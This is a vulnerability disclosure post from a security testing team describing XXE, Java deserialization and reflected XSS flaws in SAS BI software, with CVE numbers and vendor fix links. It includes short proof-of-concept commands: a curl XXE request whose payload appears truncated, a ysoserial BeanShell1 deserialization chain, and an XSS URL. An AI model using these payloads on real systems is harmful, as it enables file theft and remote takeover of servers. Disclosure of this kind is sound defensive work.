Start today, secure tomorrow.

ENG: The S-Unit finds three high impact vulnerabilities in SAS Business Intelligence software

By Sara Jun 06, 2019

Multiple webservices on the SAS application are vulnerable to Java deserialization attacks and Unauthenticated XML External Entities in SAS BI Web Services 9.4

You can find the Dutch version of this post here

Unauthenticated XML External Entities in SAS BI Web Services 9.4

The rest endpoint /SASBIWS/rest/services is vulnerable to XML External Entity attacks. The REST services use an XML parser for processing the request. This parser has been configured in a way that it allows the interpretation of Document Type Definitions and the use of external (parameter) entities. Therefore the endpoint can be used to read content from external sources, including local files from the server running the REST services and/or files from other servers in the local network.

PoC:
curl -i -s -k --data-binary ' %y; ]> ' -X $'POST' https://[target]/SASBIWS/rest/services -H $'Content-Type: application/xml'
Informatie en fix: http://support.sas.com/kb/62/987.html
CVE: CVE-2018-20733

Unauthenticated Java deserialisatie in SAS Web Infra Platform and Search Interface to SAS Content

Multiple webservices on the SAS application are vulnerable to Java deserialization attacks. The SAS application contains webservices, from which some expect serialized Java objects as input. These endpoints do not validate if the input comes from a trusted source. Therefore these webservices can be used to deserialize arbitrary Java objects, which can lead to remote code execution and complete takeover of the server.

PoC:
java -jar ysoserial.jar BeanShell1 "nslookup rcetest.[target].com"
curl -i -s -k —data-binary sas_beanshell.txt -X $'POST' https://[target]/SASWIPClientAccess/remote/ServiceRegistry -H "Content-type: application/java"
Informatie en fix: https://support.sas.com/kb/63/391.html
CVE: CVE-2018-20732

A third reflected Cross-Site Scripting SAS Logon Manager 9.4

The timeout page at https://[target]/SASLogon/timeout is again vulnerable to reflected Cross-Site Scripting. When a GET parameter with JavaScript code is added to the URL, it will be added to window.location.href after clicking on log of and the JavaScript code will be executed.

PoC:
https://[target]/SASLogon/timeout?qq';alert(1);a= 'a
Informatie en fix: http://support.sas.com/kb/55/537.html
CVE: CVE-2015-9281

penetrationtest exploit CVE